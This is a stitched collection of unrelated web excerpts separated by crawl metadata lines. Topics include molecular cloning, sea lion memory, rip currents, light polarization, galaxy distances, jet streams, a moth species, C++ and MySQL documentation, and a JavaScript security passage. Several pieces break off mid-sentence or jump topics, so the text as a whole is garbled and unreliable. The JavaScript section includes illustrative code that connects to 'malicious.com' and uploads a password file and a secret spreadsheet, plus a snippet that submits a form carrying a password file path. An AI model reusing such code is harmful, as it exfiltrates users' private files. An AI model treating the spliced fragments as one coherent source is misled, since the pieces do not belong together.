A cloning vector is a small piece of DNA into which a foreign DNA fragment can be inserted. The insertion of the fragment into the cloning vector is carried out by treating the vector and the foreign DNA with the same restriction enzyme, then ligating the fragments together. There are many types of cloning vectors. Genetically engineered plasmids and bacteriophages (such as phage λ) are perhaps most commonly used for this purpose. Other types of cloning vectors include bacterial artificial chromosomes (BACs) and yeast artificial chromosomes (YACs).

Pet cloning is the commercial cloning of a pet animal. The first commercially cloned pet was a cat named Little Nicky, produced in 2004 by Genetic Savings & Clone for a north Texas woman for a fee of US$50,000. On May 21, 2008, BioArts International announced a limited commercial dog cloning service through a program it calls Best Friends Again. This program followed the announcement of the successful cloning of a family dog, Missy, which was widely publicized in the Missyplicity Project. In September 2009, BioArts announced the end of its dog cloning service.

Source: Wikipedia (All text is available under the terms of the GNU Free Documentation License and Creative Commons Attribution-ShareAlike License.)
<urn:uuid:5719458c-1988-4b9c-ba5f-10f143f7a867>
3.984375
1,080
Knowledge Article
Science & Tech.
23.800998
CALIFORNIA sea lions may have the best memory of all non-human creatures. A female called Rio that learned a trick involving letters and numbers could still perform it 10 years later - even though she hadn't performed the trick in the intervening period.

Learning concepts such as "sameness" - when one letter or number matches another, for example - is thought to require sophisticated brain processing. So scientists expect animals to have trouble retaining the ability over long periods unless they are given repeated reminders of the rules. Primates like the rhesus macaque have been found to have impressive long-term memories, but Rio trumped them all.

Colleen Kastak and Ronald Schusterman, marine biologists at the University of California, Santa Cruz, began training her in 1991. They started by holding up a card with a number or letter on it. Rio was then shown a card bearing the same symbol and another ...
<urn:uuid:3536240a-4f05-4d6d-a9c7-6b59d137dc1b>
3.546875
214
Truncated
Science & Tech.
47.142892
THE pull of the ocean lures people to beaches the world over, but its draw doesn't stop at the edge of the sand. At many beaches, broken waves quickly regroup into hidden torrents that sweep thousands of beach-goers straight out to sea every year.

If you've ever spent time wading in the sea, you have probably felt one of these so-called "rip currents" tug at your ankles as it surges out through a calm spot in the breakers. That may seem harmless enough, but if you get caught in one while swimming the result can be deadly. The advice about escaping a rip current - sometimes wrongly called an undertow - has been doled out for decades: swim parallel to the shore. Yet rips remain a real danger. In the US alone, they contribute to about 100 drownings a year and account for about 18,000 lifeguard rescues - more than ...
<urn:uuid:88bf203e-ab88-4c2a-b76c-34bf3295ba94>
2.96875
213
Truncated
Science & Tech.
65.047812
4. METHOD OF SOLUTION

The electron differential spectrum as a function of depth is inferred by assuming that electrons travel straight ahead and that distance travelled and energy are related by a range-energy relationship. The electron dose rate at a given depth is calculated by integrating, over energy and direction, the product of the electron flux, the stopping power, and the appropriate flux-to-dose-rate conversion factor.

The bremsstrahlung source is assumed to be plane and isotropic at a given depth. This source is defined as the integral over energy and direction of the product of photon energy, the differential bremsstrahlung spectrum from electrons of a given energy, and the electron flux differential spectrum. The differential bremsstrahlung spectrum is derived from the Born approximation cross section multiplied by a correction factor. The bremsstrahlung dose rate is obtained by integrating, over photon energy and slab volume, the product of the bremsstrahlung source, photon energy flux-to-dose-rate conversion factor, buildup factor, and attenuation kernel. The buildup factor assumed is a plane isotropic buildup factor generated by Monte Carlo calculations.

The integrations are performed by evaluating the integrand at the midpoint of each integration step, multiplying by the step width, and summing the result. The incident electron spectrum, dose rate conversion factors, and range formula coefficients are input by the user. The buildup factor information is contained in three DATA statements in subroutine BURP.
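The quadrature described in the last paragraph is the ordinary midpoint rule. A minimal sketch of it (function names and the test integrand are illustrative, not taken from the program itself):

def midpoint_integrate(f, a, b, n_steps):
    """Approximate the integral of f over [a, b]: evaluate the integrand
    at the midpoint of each step, multiply by the step width, and sum."""
    h = (b - a) / n_steps
    return h * sum(f(a + (i + 0.5) * h) for i in range(n_steps))

# Example: integral of x**2 from 0 to 1 (exact value 1/3).
approx = midpoint_integrate(lambda x: x * x, 0.0, 1.0, 100)
print(approx)  # ~0.333325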
<urn:uuid:b177bc57-7ac5-4dea-8183-073921c54a64>
2.75
312
Documentation
Science & Tech.
21.59423
Search our database of handpicked sites

Looking for a great physics site? We've tracked down the very best and checked them for accuracy.

We found 13 results on physics.org and 66 results in our database of sites (65 are websites, 1 is a video, and 0 are experiments).

Search results from our links database:
- A page describing this topic and why it is so interesting.
- A great description of the Planck mission to study the first seconds of the universe, which we can now see as the cosmic microwave background.
- This is a fantastic site that covers more than just physics and tracks the history of our universe right from its beginnings. It has lots of information but also movies to watch and teacher resources.
- Definition and links to related topics.
- NASA page detailing the evidence for the big bang obtained from the study of cosmic background radiation (the CMB).
- A blog written by a group of physicists and astrophysicists on the stuff that interests them: science but also arts, politics, culture, technology, academia, and miscellaneous trivia.
- Catch up with the latest news, videos and info on the Planck mission, which is studying the Cosmic Microwave Background – the relic radiation from the Big Bang.
- See the universe in a range of wavelengths from gamma rays to radio waves.
- Information on the electromagnetic radiation from the nucleus as a part of a radioactive process.
- A brief overview of how x-rays are used in medicine; forms part of a teachers' resource for medical physics.

Showing 21 - 30 of 66
<urn:uuid:a91fa144-f7be-48a3-bafc-7c90aadf8bf1>
2.84375
342
Content Listing
Science & Tech.
53.626968
How Do We Know Light Behaves as a Wave?

A light wave is an electromagnetic wave that travels through the vacuum of outer space. Light waves are produced by vibrating electric charges. The nature of such electromagnetic waves is beyond the scope of The Physics Classroom Tutorial. For our purposes, it is sufficient to merely say that an electromagnetic wave is a transverse wave that has both an electric and a magnetic component.

The transverse nature of an electromagnetic wave is quite different from any other type of wave that has been discussed in The Physics Classroom Tutorial. Let's suppose that we use the customary slinky to model the behavior of an electromagnetic wave. If an electromagnetic wave traveled towards you, you would observe the vibrations of the slinky occurring in more than one plane of vibration. This is quite different from what you might notice if you were to look along a slinky and observe a slinky wave traveling towards you. Indeed, the coils of the slinky would be vibrating back and forth as the slinky approached; yet these vibrations would occur in a single plane of space. That is, the coils of the slinky might vibrate up and down or left and right. Yet regardless of their direction of vibration, they would be moving along the same linear direction as you sighted along the slinky. If a slinky wave were an electromagnetic wave, then the vibrations of the slinky would occur in multiple planes. Unlike a usual slinky wave, the electric and magnetic vibrations of an electromagnetic wave occur in numerous planes.

A light wave that is vibrating in more than one plane is referred to as unpolarized light. Light emitted by the sun, by a lamp in the classroom, or by a candle flame is unpolarized light. Such light waves are created by electric charges that vibrate in a variety of directions, thus creating an electromagnetic wave that vibrates in a variety of directions. This concept of unpolarized light is rather difficult to visualize. In general, it is helpful to picture unpolarized light as a wave that has an average of half its vibrations in a horizontal plane and half of its vibrations in a vertical plane.

It is possible to transform unpolarized light into polarized light. Polarized light waves are light waves in which the vibrations occur in a single plane. The process of transforming unpolarized light into polarized light is known as polarization.
There are a variety of methods of polarizing light. The four methods discussed on this page are:
- Polarization by Transmission
- Polarization by Reflection
- Polarization by Refraction
- Polarization by Scattering

The most common method of polarization involves the use of a Polaroid filter. Polaroid filters are made of a special material that is capable of blocking one of the two planes of vibration of an electromagnetic wave. (Remember, the notion of two planes or directions of vibration is merely a simplification that helps us to visualize the wavelike nature of the electromagnetic wave.) In this sense, a Polaroid serves as a device that filters out one-half of the vibrations upon transmission of the light through the filter. When unpolarized light is transmitted through a Polaroid filter, it emerges with one-half the intensity and with vibrations in a single plane; it emerges as polarized light.

A Polaroid filter is able to polarize light because of the chemical composition of the filter material. The filter can be thought of as having long-chain molecules that are aligned within the filter in the same direction. During the fabrication of the filter, the long-chain molecules are stretched across the filter so that each molecule is (as much as possible) aligned in, say, the vertical direction. As unpolarized light strikes the filter, the portion of the waves vibrating in the vertical direction is absorbed by the filter. The general rule is that the electromagnetic vibrations that are in a direction parallel to the alignment of the molecules are absorbed.

The alignment of these molecules gives the filter a polarization axis. This polarization axis extends across the length of the filter and only allows vibrations of the electromagnetic wave that are parallel to the axis to pass through. Any vibrations that are perpendicular to the polarization axis are blocked by the filter. Thus, a Polaroid filter with its long-chain molecules aligned horizontally will have a polarization axis aligned vertically. Such a filter will block all horizontal vibrations and allow the vertical vibrations to be transmitted (see diagram above). On the other hand, a Polaroid filter with its long-chain molecules aligned vertically will have a polarization axis aligned horizontally; this filter will block all vertical vibrations and allow the horizontal vibrations to be transmitted.

Polarization of light by use of a Polaroid filter is often demonstrated in a Physics class through a variety of demonstrations. Filters are used to look through and view objects. The filter does not distort the shape or dimensions of the object; it merely serves to produce a dimmer image of the object since one-half of the light is blocked as it passes through the filter. A pair of filters is often placed back to back in order to view objects looking through two filters. By slowly rotating the second filter, an orientation can be found in which all the light from an object is blocked and the object can no longer be seen when viewed through two filters. What happened? In this demonstration, the light was polarized upon passage through the first filter; perhaps only vertical vibrations were able to pass through. These vertical vibrations were then blocked by the second filter since its polarization axis is aligned in a horizontal direction. While you are unable to see the axes on the filter, you will know when the axes are aligned perpendicular to each other because with this orientation, all light is blocked.
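The quantitative version of this two-filter behavior is Malus's law, which the tutorial does not state explicitly: the second filter passes a cos² fraction of the polarized light, where the angle is measured between the two polarization axes. A short sketch, assuming ideal filters:

import math

def transmitted_intensity(i0, theta_degrees):
    """Intensity after an ideal two-filter stack.

    The first filter halves unpolarized light of intensity i0; the second
    passes a cos^2 fraction, where theta is the angle between the axes
    (Malus's law). Crossed filters (theta = 90) transmit nothing.
    """
    theta = math.radians(theta_degrees)
    return 0.5 * i0 * math.cos(theta) ** 2

print(transmitted_intensity(100.0, 0))    # 50.0 -- parallel axes
print(transmitted_intensity(100.0, 90))   # ~0.0 -- crossed axes, all light blocked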
So by use of two filters, one can completely block all of the light that is incident upon the set; this will only occur if the polarization axes are rotated such that they are perpendicular to each other. A picket-fence analogy is often used to explain how this dual-filter demonstration works. A picket fence can act as a polarizer by transforming an unpolarized wave in a rope into a wave that vibrates in a single plane. The spaces between the pickets of the fence will allow vibrations that are parallel to the spacings to pass through while blocking any vibrations that are perpendicular to the spacings. Obviously, a vertical vibration would not have the room to make it through a horizontal spacing. If two picket fences are oriented such that the pickets are both aligned vertically, then vertical vibrations will pass through both fences. On the other hand, if the pickets of the second fence are aligned horizontally, then the vertical vibrations that pass through the first fence will be blocked by the second fence. This is depicted in the diagram below. In the same manner, two Polaroid filters oriented with their polarization axes perpendicular to each other will block all the light. Now that's a pretty cool observation that could never be explained by a particle view of light. Unpolarized light can also undergo polarization by reflection off of nonmetallic surfaces. The extent to which polarization occurs is dependent upon the angle at which the light approaches the surface and upon the material that the surface is made of. Metallic surfaces reflect light with a variety of vibrational directions; such reflected light is unpolarized. However, nonmetallic surfaces such as asphalt roadways, snowfields and water reflect light such that there is a large concentration of vibrations in a plane parallel to the reflecting surface. A person viewing objects by means of light reflected off of nonmetallic surfaces will often perceive a glare if the extent of polarization is large. Fishermen are familiar with this glare since it prevents them from seeing fish that lie below the water. Light reflected off a lake is partially polarized in a direction parallel to the water's surface. Fishermen know that the use of glare-reducing sunglasses with the proper polarization axis allows for the blocking of this partially polarized light. By blocking the plane-polarized light, the glare is reduced and the fisherman can more easily see fish located under the water. Polarization can also occur by the refraction of light. Refraction occurs when a beam of light passes from one material into another material. At the surface of the two materials, the path of the beam changes its direction. The refracted beam acquires some degree of polarization. Most often, the polarization occurs in a plane perpendicular to the surface. The polarization of refracted light is often demonstrated in a Physics class using a unique crystal that serves as a double-refracting crystal. Iceland Spar, a rather rare form of the mineral calcite, refracts incident light into two different paths. The light is split into two beams upon entering the crystal. Subsequently, if an object is viewed by looking through an Iceland Spar crystal, two images will be seen. The two images are the result of the double refraction of light. Both refracted light beams are polarized - one in a direction parallel to the surface and the other in a direction perpendicular to the surface. 
Since these two refracted rays are polarized with a perpendicular orientation, a polarizing filter can be used to completely block one of the images. If the polarization axis of the filter is aligned perpendicular to the plane of polarized light, the light is completely blocked by the filter; meanwhile the second image is as bright as can be. And if the filter is then turned 90 degrees in either direction, the second image reappears and the first image disappears. Now that's a pretty neat observation that could never be observed if light did not exhibit any wavelike behavior.

Polarization also occurs when light is scattered while traveling through a medium. When light strikes the atoms of a material, it will often set the electrons of those atoms into vibration. The vibrating electrons then produce their own electromagnetic wave that is radiated outward in all directions. This newly generated wave strikes neighboring atoms, forcing their electrons into vibrations at the same original frequency. These vibrating electrons produce another electromagnetic wave that is once more radiated outward in all directions. This absorption and reemission of light waves causes the light to be scattered about the medium. (This process of scattering contributes to the blueness of our skies, a topic to be discussed later.) This scattered light is partially polarized. Polarization by scattering is observed as light passes through our atmosphere. The scattered light often produces a glare in the skies. Photographers know that this partial polarization of scattered light leads to photographs characterized by a washed-out sky. The problem can easily be corrected by the use of a Polaroid filter. As the filter is rotated, the partially polarized light is blocked and the glare is reduced. The photographic secret of capturing a vivid blue sky as the backdrop of a beautiful foreground lies in the physics of polarization and Polaroid filters.

Polarization has a wealth of other applications besides its use in glare-reducing sunglasses. In industry, Polaroid filters are used to perform stress analysis tests on transparent plastics. As light passes through a plastic, each color of visible light is polarized with its own orientation. If such a plastic is placed between two polarizing plates, a colorful pattern is revealed. As the top plate is turned, the color pattern changes as new colors become blocked and the formerly blocked colors are transmitted. A common Physics demonstration involves placing a plastic protractor between two Polaroid plates and placing them on top of an overhead projector. It is known that structural stress in plastic is signified at locations where there is a large concentration of colored bands. This location of stress is usually the location where structural failure will most likely occur. Perhaps you wish that a more careful stress analysis were performed on the plastic case of the CD that you recently purchased.

Polarization is also used in the entertainment industry to produce and show 3-D movies. Three-dimensional movies are actually two movies being shown at the same time through two projectors. The two movies are filmed from two slightly different camera locations. Each individual movie is then projected from different sides of the audience onto a metal screen. The movies are projected through a polarizing filter.
The polarizing filter used for the projector on the left may have its polarization axis aligned horizontally while the polarizing filter used for the projector on the right would have its polarization axis aligned vertically. Consequently, there are two slightly different movies being projected onto a screen. Each movie is cast by light that is polarized with an orientation perpendicular to the other movie. The audience then wears glasses that have two Polaroid filters. Each filter has a different polarization axis - one is horizontal and the other is vertical. The result of this arrangement of projectors and filters is that the left eye sees the movie that is projected from the right projector while the right eye sees the movie that is projected from the left projector. This gives the viewer a perception of depth.

Our model of the polarization of light provides some substantial support for the wavelike nature of light. It would be extremely difficult to explain polarization phenomena using a particle view of light. Polarization would only occur with a transverse wave. For this reason, polarization is one more reason why scientists believe that light exhibits wavelike behavior.

In the demonstration, a Polaroid filter is placed upon the glass panel of a classroom-style overhead projector. Light passing through the filter becomes polarized. Different sectors of the taped glass will rotate the axes of polarization of the different wavelengths of light different amounts. A second filter is then placed over the taped glass. This second filter permits passage of wavelengths (i.e. colors) of light whose axis of polarization lines up with the transmitting axis of the filter; other wavelengths are blocked. Thus, different sectors appear different colors when viewed through both filters.

1. Suppose that light passes through two Polaroid filters whose polarization axes are parallel to each other. What would be the result?

2. Light becomes partially polarized as it reflects off nonmetallic surfaces such as glass, water, or a road surface. The polarized light consists of waves that vibrate in a plane that is ____________ (parallel, perpendicular) to the reflecting surface.

3. Consider the three pairs of sunglasses below. Identify the pair of glasses that is capable of eliminating the glare resulting from sunlight reflecting off the calm waters of a lake. _________ Explain. (The polarization axes are shown by the straight lines.)
<urn:uuid:635353cd-795f-4736-ab20-12c94ed8699a>
3.546875
3,152
Tutorial
Science & Tech.
34.857531
Mar31-10, 08:14 PM  #1

simple harmonic oscillation

1. The problem statement, all variables and given/known data
A block of mass 5 kg is attached to a spring of spring constant 2000 N/m and compressed a distance of 0.6 m. The spring is then released and oscillates.
a. What are the period, frequency, and angular frequency?
b. What is the energy in this system?
c. What is the maximum velocity?

2. Relevant equations
d²x/dt² + (k/m)x = 0
ω = 2πf = 2π/T = √(k/m)
E = ½mv² + ½kx² = ½kA²

3. The attempt at a solution
I have not been able to attempt a solution because I do not know where to start. Please help.

Mar31-10, 08:26 PM  #2

You have all your equations and all the variables needed to find your unknowns. If ω = √(k/m), then you can find the period, frequency, and angular frequency from there. The energy of a spring is defined as ½kx². The maximum velocity occurs when all the spring's potential energy has become kinetic energy (at the equilibrium point).
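Following reply #2, a quick numeric check (a sketch; the values are computed from the numbers in the problem statement):

import math

m, k, A = 5.0, 2000.0, 0.6       # mass (kg), spring constant (N/m), amplitude (m)

omega = math.sqrt(k / m)          # angular frequency = 20 rad/s
T = 2 * math.pi / omega           # period ~ 0.314 s
f = 1.0 / T                       # frequency ~ 3.18 Hz
E = 0.5 * k * A ** 2              # total energy = 360 J
v_max = omega * A                 # max speed = 12 m/s (all E kinetic at equilibrium)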
<urn:uuid:79231551-bed6-4a90-8f81-14ee9400fe02>
3.078125
398
Comment Section
Science & Tech.
64.284118
See chapter 1 of the book. This list is not complete.

So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do. Without such rules, a script could, for instance, open a connection to a hostile server and upload private files:

var security_hazard = connection.open('malicious.com');
security_hazard.upload(filesystem.read('/my/password/file'));
security_hazard.upload(filesystem.read('/ultra_secret/loans.xls'));

Or it could silently fill in and submit a file-upload form on the user's behalf:

document.forms.upload_field.value = '/my/password/file';
document.forms.submit();

Hence the feared browser incompatibilities. It's best to solve compatibility problems on a case-by-case basis. In fact, most pages on this site have been written precisely because of browser incompatibilities. So read on to understand more. But I warn you: you need to digest quite a lot of information. Therefore it's best to solve the problem at hand and leave the rest of the information alone until you need it. In addition, specifying side effects that are too complicated to explain right now.

Then how do you determine whether a browser can handle your script? The basic rule is: don't use a browser detect, use an object detect.
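The page doesn't show the object-detection pattern at this point, but a minimal sketch of the idea looks like this (the feature tested and the fallback are illustrative):

// Don't ask "which browser is this?"; ask "does the object I need exist?"
if (document.getElementById) {
    var element = document.getElementById('main');
    // ... safe to use getElementById-based code here
} else {
    // Feature is missing: degrade gracefully instead of guessing the browser.
}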
<urn:uuid:b0d30013-5347-4894-9a7d-8df07fe84052>
2.828125
278
Tutorial
Software Dev.
50.2522
Oct. 22, 2007

Although the ozone hole over the Antarctic this year is relatively small, this is due to mild temperatures in the region's stratosphere this winter and is not a sign of recovery, the United Nations World Meteorological Organization (WMO) has said.

Since 1998, only the ozone holes of 2002 and 2004 have been smaller than this year's – both in terms of area and amount of destroyed ozone – and this is not indicative of ozone recuperation, the agency said. Instead, it is due to mild temperatures in the stratosphere, which still contains sufficient chlorine and bromine to completely destroy ozone in the 14-21 kilometer altitude range.

The amount of gases which diminish ozone in the Antarctic stratosphere peaked around the year 2000. However, despite the decline in the amount by 1 per cent annually, enough chlorine and bromine will remain in the stratosphere for another decade or two, which could result in severe ozone holes, WMO said.

The size of the ozone hole will also be determined by the stratosphere's meteorological conditions during the Antarctic winter. As greenhouse gases accumulate in the atmosphere, temperatures will fall in the stratosphere, increasing the threat of severe ozone holes in the future.
<urn:uuid:e42a443b-72eb-4b4b-8bd8-b319f16fa357>
3.796875
304
Truncated
Science & Tech.
33.280563
Jay M. Pasachoff is Field Memorial Professor of Astronomy at Williams College in Massachusetts. He sent this answer: "Trigonometric parallax--the tiny, apparent back-and-forth shifts of nearby stars caused by our changing perspective as the earth orbits the sun--can indeed be used to measure distances only to comparatively nearby stars. Some of the best data on stellar positions in the sky come from Hipparcos, a spacecraft launched in 1989 by the European Space Agency. Hipparcos has measured the trigonometric parallaxes of about 10,000 stars to an accuracy of better than 10 percent, out to a distance of about 300 light-years. But our galaxy is about 100,000 light-years across, so parallax measurements become useless long before we approach the distances to other galaxies. "The traditional way to measure distances to nearby galaxies is by studying variable stars, especially a type of bright variable star known as a Cepheid variable. Early in this century Henrietta Swan Leavitt discovered that the longer the period of variation of a Cepheid variable, the greater its luminosity. Another American astronomer, Harlow Shapley, then was able to correlate the brightnesses of Cepheids with those of known types of ordinary stars, tying Leavitt's relative distance scale to an absolute one. Thus, we can observe a Cepheid, note how long it takes for its brightness to vary and plot that information on an already established graph to find out its intrinsic luminosity. Comparing this true brightness (its 'absolute magnitude') with its apparent brightness as seen in the sky (its 'apparent magnitude') allows us to calculate how far away it is, using the inverse-square law of brightness. "Fortunately, Cepheids are luminous enough that they can be observed in other galaxies, not just in our own. In the 1920s Edwin Hubble used the period-luminosity relation for variable stars to establish the distances to various galaxies and proved that they lie far outside our Milky Way. In the course of that work, he discovered what we now call 'Hubble's law,' that galaxies display a linear relation between distance and redshift (the redshift is the shift in the positions of lines in the galaxies' spectra toward the red end of the rainbow). Hubble's law is the basis for the modern understanding that we live in an expanding universe. After measuring the redshift, which we can do by passing a galaxy's light through a spectrogram, we can deduce the distance using Hubble's law. This technique is the astronomer's basic tool for finding the distances to the farthest things in the universe. "But of course there are many complications. Maybe the relation between redshift and distance is not quite linear when we get very far out in the universe. Maybe there are giant concentrations of mass that distort what is otherwise thought to be a smooth, outward expansion, or 'Hubble flow.' Maybe the expansion of the universe inferred by Hubble is accelerated by a 'cosmological constant' in Einstein's equations, the solutions of which are the basis for theoretical cosmology. And measurements of the rate of the cosmic expansion remain controversial. The Hubble Space Telescope is in the process of observing a large set of Cepheid variables in distant galaxies in order to resolve this question. "Cosmologists are also turning their attention to other bright objects that can be seen at great distances as a way of verifying the accuracy of their measurements. 
A certain kind of exploding star, or supernova (called a Type Ia supernova), always seems to have the same peak luminosity, so these supernovae can be used as 'standard candles' instead of Cepheids. Supernovae are billions of times brighter than Cepheids; as a result, they can be observed at far greater distances. A number of researchers are trying to exploit this advantage and get more accurate information about the size and age of the universe. The Hubble Space Telescope is assisting in this work as well.
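The inverse-square comparison of absolute and apparent magnitude described above is usually written as the textbook distance-modulus relation, m - M = 5 log10(d) - 5, with d in parsecs. Here is a small illustrative program (my own addition, with made-up example numbers rather than figures from the article):

#include <cmath>
#include <cstdio>

// Distance modulus: m - M = 5*log10(d_pc) - 5, so d = 10^((m - M + 5)/5).
// This is the standard textbook relation, not code from the article.
double distance_parsecs(double apparent_mag, double absolute_mag) {
    return std::pow(10.0, (apparent_mag - absolute_mag + 5.0) / 5.0);
}

int main() {
    // Illustrative numbers only: a Cepheid of absolute magnitude -4 seen
    // at apparent magnitude 11 works out to about 10,000 parsecs away.
    double d = distance_parsecs(11.0, -4.0);
    std::printf("distance: %.0f parsecs (about %.0f light-years)\n",
                d, d * 3.26);
    return 0;
}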
<urn:uuid:94ed3fd6-a6fc-4508-9672-3fd165fdea7c>
4.3125
825
Knowledge Article
Science & Tech.
34.799968
Carbon nanotube springs could herald a new era of energy storage
Since the system would store energy in a spring, it won't lose any charge over time and could potentially be used endlessly to store energy without any loss in performance. The nanotube springs could store about 1,000 times the energy of steel springs and offer an energy density comparable to the best lithium-ion batteries. While conventional batteries need to be recharged frequently to ensure that they have full power when the need arises, carbon nanotube springs can store energy for a longer period of time without needing a recharge. Moreover, since the springs are lightweight, they won't add much weight to the system, which will ultimately enhance its performance. And unlike lithium-ion batteries, which need specific conditions to work, carbon nanotube springs are not dependent on environmental conditions either.
Image courtesy: Wikipedia
<urn:uuid:05317741-ef16-495e-bfc6-a9bef32c1f1d>
3.15625
376
Truncated
Science & Tech.
23.954417
Jet streams are fast-moving rivers of air in the upper levels of the atmosphere. You may have heard about jet streams on television, where weathercasters track their paths on weather maps. Weather forecasters pay close attention to the positions of the jet streams because they mark the boundary between warm and cold air and have much to do with how weather systems form. Jet streams have a strong effect on weather because they steer the movement of high- and low-pressure systems and block the movement of upper-level moisture and energy. Jet streams do not usually move in straight paths; the path of a jet stream typically has a meandering shape. Each large curve or meander of the jet stream is known as a Rossby wave. Jet streams follow the boundaries between hot and cold air. Since the temperature changes in the atmosphere are greatest around 30° and around 50°–60° latitude in the Northern and Southern Hemispheres, this is where the jet streams form. The major Northern Hemisphere jet streams are the polar jet, which forms at 50°–60° north latitude, and the subtropical jet, near 30° north latitude. The strength and position of the polar jet is important because most large winter storm systems form and move along it. In the Northern Hemisphere winter, areas may experience colder-than-normal periods as the polar jet stream dips south, bringing cold air in from Arctic regions. A climate study conducted between 1979 and 2001 found that the positions of the jet streams in both the Northern and Southern Hemispheres have shifted toward the poles, a trend some scientists believe will continue. This change of position is important to projecting future climate conditions because it may affect the formation and severity of storms in mid-latitude regions. Jet streams over subtropical regions typically slow the development of hurricanes; the movement of jet streams away from these regions may therefore result in more frequent and severe hurricanes. The tracks that storms follow will also change as a result of the shifting positions of the jet streams. Scientists are currently studying why the positions of the jet streams are changing. It may be due to natural patterns of variation, to human impacts on the climate system, or to a combination of the two.
<urn:uuid:a4971e39-600a-4d13-bfbc-9fa3e615c1c4>
4.59375
587
Knowledge Article
Science & Tech.
44.673712
This section is for the benefit of those new to the growing field of applied geophysics. The success of all geophysical methods relies on there being a measurable contrast between the physical properties of the target and those of the surrounding medium. The properties used are typically density, elasticity, magnetic susceptibility, electrical conductivity, and radioactivity. Knowledge of the material properties likely to be associated with a target is thus essential to guide the selection of the correct method to be used and to interpret the results obtained. Often a combination of methods provides the best means of solving complex problems.
<urn:uuid:482ca434-cc93-4c6a-a05f-d709109119d3>
3.21875
119
Knowledge Article
Science & Tech.
21.565
Fires in Zambia, Africa
Managing wildfire is a difficult business, but it is pretty much the same the world over. To prevent future fires, you start small controlled fires to remove what wildfires can use as fuel in areas you really don't want burned. Recently, personnel from the U.S. Forest Service have been teaching fire monitoring to personnel in Zambia's Kafue National Park. Kafue National Park is more than twice the size of Yellowstone. Fire plays a big role in maintaining a healthy ecosystem, but you want to control its spread across the region and contain it as best you can. This is done by purposely igniting fires just after the wet season, removing most of the fuel before the land really dries out. Early-season fires, when the ground is still wet, have few negative ecological effects; dry-season fires, however, tend to burn intensely and uncontrollably. This pattern is significantly reducing shrub cover across Kafue, which provides essential wildlife habitat. The information presented above was taken from a USDA blog dated August 30, 2012. The fires seen in this image may well be intentionally set fires meant to burn out areas that could have fueled future wildfires. This natural-color satellite image shows smoke streaming from fires across Zambia. It was collected by the Moderate Resolution Imaging Spectroradiometer (MODIS) aboard the Aqua satellite on September 2, 2012. Actively burning areas, detected by MODIS's thermal bands, are outlined in red. NASA image courtesy Jeff Schmaltz, LANCE/EOSDIS MODIS Rapid Response Team, GSFC. Caption by Lynn Jenner.
<urn:uuid:fe77c417-f863-44fd-b8b8-81a1f970f0a6>
3.484375
344
Knowledge Article
Science & Tech.
41.121865
Scientific name: Shargacucullia lychnitis
Flies at night in June and July. Similar to the Mullein (S. verbasci), but typically smaller and lighter, the Mullein flying from late April to May. The larvae of both species are also superficially similar, the Mullein having black spotting between each segment, whereas Striped Lychnis larvae generally have a clear band of pale green between each segment. The Striped Lychnis larva feeds from July to mid-September, whereas that of the Mullein feeds from late May to July.
- Medium Sized
- Wing Span Range (male to female) - 42-47mm
- UK BAP: Priority Species
- Nationally Scarce
The larva usually feeds on the flowers and can readily be found by day, July to mid-September. Overwinters as a pupa, on or just below the ground surface.
Particular Caterpillar Food Plants
Dark Mullein (Verbascum nigrum), but has been reported on White Mullein (V. lychnitis) and ornamental mulleins in gardens.
- Countries – England
- Local in southern England, being found in West Sussex, Hampshire, Berkshire, Buckinghamshire and Oxfordshire. Also recorded once recently in Wiltshire. Formerly found in some other parts of southern England.
- Distribution Trend Since 1970s = Britain: Declining
Roadside verges, embankments, field margins, rough downland, and also woodland rides and clearings. Usually in unshaded situations.
<urn:uuid:ee1c1a9c-7265-41bd-a4aa-ace279e066fc>
3.1875
329
Knowledge Article
Science & Tech.
41.789326
#include <deque>

void push_back( const TYPE& val );

The push_back() function appends val to the end of the deque. For example, the following code puts 10 integers into a deque:

deque<int> dq;
for( int i = 0; i < 10; i++ )
    dq.push_back( i );

When displayed, the resulting deque would look like this:

0 1 2 3 4 5 6 7 8 9

push_back() runs in constant time.
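For readers who want to compile the fragment above, here is a self-contained version (my own sketch, not part of the original reference entry):

#include <deque>
#include <iostream>

int main() {
    std::deque<int> dq;
    for (int i = 0; i < 10; i++)
        dq.push_back(i);          // append each value at the back

    for (int v : dq)              // prints: 0 1 2 3 4 5 6 7 8 9
        std::cout << v << ' ';
    std::cout << '\n';
    return 0;
}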
<urn:uuid:b15ee3c1-f85f-4d81-9011-4bcb2da05270>
2.71875
114
Documentation
Software Dev.
83.241364
[begin_label:] LOOP
    statement_list
END LOOP [end_label]

LOOP implements a simple loop construct, enabling repeated execution of the statement list, which consists of one or more statements, each terminated by a semicolon (;) statement delimiter. The statements within the loop are repeated until the loop is terminated. Usually, this is accomplished with a LEAVE statement. Within a stored function, RETURN can also be used, which exits the function entirely. Neglecting to include a loop-termination statement results in an infinite loop.

CREATE PROCEDURE doiterate(p1 INT)
BEGIN
  label1: LOOP
    SET p1 = p1 + 1;
    IF p1 < 10 THEN ITERATE label1; END IF;
    LEAVE label1;
  END LOOP label1;
  SET @x = p1;
END;
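To trace the example (my reading of the code, not text from the original page): calling the procedure with CALL doiterate(0); increments p1 on each pass, ITERATE restarts the loop while p1 < 10, and once p1 reaches 10 the LEAVE statement exits the loop, so a subsequent SELECT @x; returns 10.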
<urn:uuid:20f65d34-823e-4e74-ac51-567b385a26b0>
3.015625
176
Documentation
Software Dev.
36.005471
As a teenager I found it hard to picture the 3D structure of DNA, proteins and other molecules. Remember, we didn't have a computer then, no videos, nor 3D pictures or 3D models. I tried to fill the gap by making DNA molecules out of (used) matches and colored clay, based on descriptions in dry (and dull, 2D) textbooks, but you can imagine that these creative 3D clay figures bore little resemblance to the real molecular structures. But luckily things have changed over the last 40 years. Not only do we have computers and videos, there are also ready-made molecular models, specially designed for education. Oh, how I wish my chemistry teachers had had those DNA (starter) kits. Hat tip: Joanne Manaster @sciencegoddess on Twitter. Curious? Here is the Products Catalog of http://3dmoleculardesigns.com/news2.php Of course, such "synthesis" (copying) of existing molecules - though very useful for educational purposes - is overshadowed by the recent creation of molecules other than DNA and RNA [xeno-nucleic acids (XNAs)] that can be used to store and propagate information and have the capacity for Darwinian evolution. But that is quite a different story.
<urn:uuid:cd8f2746-e0be-4f53-b3da-f09fe4455fef>
3.421875
376
Personal Blog
Science & Tech.
40.362544
Creating and Accessing Web Services Walkthroughs
